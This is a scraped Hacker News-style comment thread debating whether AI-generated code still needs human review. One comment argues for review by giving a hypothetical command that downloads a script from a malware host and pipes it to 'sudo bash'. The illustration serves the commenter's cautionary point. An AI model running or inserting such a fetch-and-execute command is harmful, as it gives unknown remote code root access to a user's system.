3 ms·
> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead. Maybe for a personal project
by tuckwat 8mo ago
> You no longer need to review the code. Or instruct the model at the level of files or functions. You can test behaviors instead.
Maybe for a personal project but this doesn't work in a multi-dev environment with paying customers. In my experience, paying attention to architecture and the code itself results in a much more pliable application that can be evolved.
- zdragnar 8mo agoEveryone who is responsible for SOC 2 at their company just felt a disturbance. Honestly, I can't wait for AI: development practices to mature, because I'm really tired of the fake hype and missteps getting in the way of things.
- LtWorf 8mo agoWhy would AI not fall for fake hype?
- madrox 8mo agoIt's doesn't work...yet. I agree my stomach churns a little at this sentence. However, paying customers care about reliability and performance. Code review helps that today, but it's only a matter of time before it is more performative than useful in serving those goals at the cost of velocity.
- AIorNot 8mo agothe (multi) billon dollar question is when that will happen, I think, case in point: the OP is a kid in his 20s describing the history of the last 3 years or so of small scale AI Development (https://www.linkedin.com/in/silen-naihin/details/experience/ https://www.linkedin.com/in/silen-naihin/details/experience/) How does that compare to those of us with 15-50 years of software engineering experience working on giant codebases that have years of domain rules, customers and use cases etc. When will AI be ready? Microsoft tried to push AI into big enterprise, Anthropic is doing a better job -but its all still in infancy Personally for me I hope it won't be ready for another 10 years so I can retire before it takes over :) I remember when folks on HN all called this AI stuff made up
- madrox 8mo agoAs a guy in his mid-forties, I sympathize with that sentiment. I do think you're missing how this will likely go down in practice, though. Those giant codebases with years of domain rules are all legacy now. The question is how quickly a new AI codebase could catch up to that code base and overtake it, with all the AI-compatibility best practices baked in. Once that happens, there is no value in that legacy code. Any prognostication is a fool's errand, but I wouldn't go long on those giant codebases.
- AIorNot 8mo agoYeah agreed - It all depends on how quickly AI (or more aptly, ai driven work done by humans hoping to make a buck) starts replacing real chunks of production workflows “prediction is hard especially about the future” - yogi berra As a hedge - I have personally dived deep into AI coding, actually have been for 3 years now - I’ve even launched 2 AI startups and working on a third - but its all so unpredictable and hardly lucrative yet As an over 50 year old - I’m a clear target for replacement by AI
- tacker2000 8mo agoThats the problem, the most “noise” regarding AI is made by juniors who are wowed by the ability to vibe code some fun “sideproject” React CRUD apps, like compound interest calculators or PDF converters. No mention of the results when targeting bigger, more complex projects, that require maintainability, sound architectural decisions, etc… which is actually the bread and butter of SW engineering and where the big bucks get made.
- KellyCriterion 8mo ago>>like compound interest calculators or PDF converters. Caught you! You have been on HN very actively the last days, because these were exactly the projects in "Show HN: .." category and you would not be able to tell them if you wouldnt have spent your whole time here :-D Ha! :-D
- Ronsenshi 8mo ago
- nzoschke 8mo agoCounter argument... High velocity teams also observe production system telemetry and use error rates, tracing and more to maintain high SLAs for customers. They set a "budget" and use feature flagging to release risky code and roll back or roll forward based on metrics. So agentic coding can feed back on observed behaviors in production too.
- SilenN 8mo agoAgree. And with the comments in the thread. I'll caveat my statement, with AI ready repos. Meaning those with good documentation, good comments (ex. avoiding Chestertons fence), comprehensive interface tests, Sentry, CI/CD, etc. Established repos are harder because a) the marginal cost of something going wrong is much higher b) there's more dependencies c) this makes it harder to 'comprehensively' ensure the AI didn't mess anything up I say this in the article > There's no "right answer." The only way to create your best system is to create it yourself by being in the loop. Best is biased by taste and experience. Experiment, iterate, and discover what works for you. Try pushing the boundary. It's like figuring out the minimum amount of sleep you need. You undersleep and oversleep a couple times, but you end up with a good idea. To be clear, I'm not advocating for canonical 'vibe coding'. Just that what it means to be a good engineer has changed again. 1) Being able to quickly create a mental map of code at the speed of changes, 2) debugging and refactoring 3) prompting, 4) and ensuring everything works (verifiability) are now the most valuable skills. We should also focus more on the derivative than our point in time.
- worksonmine 8mo ago> Being able to quickly create a mental map of code at the speed of changes I get the feeling you're intentionally being a parody with that line. > and ensuring everything works (verifiability) are now the most valuable skills. Something might look like it works, and pass all the tests, but it could still be running `wget https://malware.sh https://malware.sh | sudo bash`. Without knowing that it's there how will your tests catch it? My example is exaggerated and in the real world it will be more subtle and less nefarious, but just as dangerous. This has already happened, OpenCode is a recent such example. It was on the front page a few days ago, you should check it out. Of course you have to review the code. Who are you trying to fool? > We should also focus more on the derivative than our point in time. So why are you selling it as possible in "our point in time" (are you getting paid per buzzword?). I read the quote as "Yes, I'm full of shit, but consider the possibilities and stop being a buzzkill bro". Extremely depressing to see this happening to the craft I used to love.
- SilenN 8mo ago
- jasondigitized 8mo agoNa. Most successful startups don't worry about super tight code up front and hack the shit out of something and support tens of thousands of user with completely garbage code and architecture. I know this because I am at one now making an ungodly amount of money with 50k active users a day on a complete mudball monothilic node + react + postgres app used by multiple Fortune 100 companies.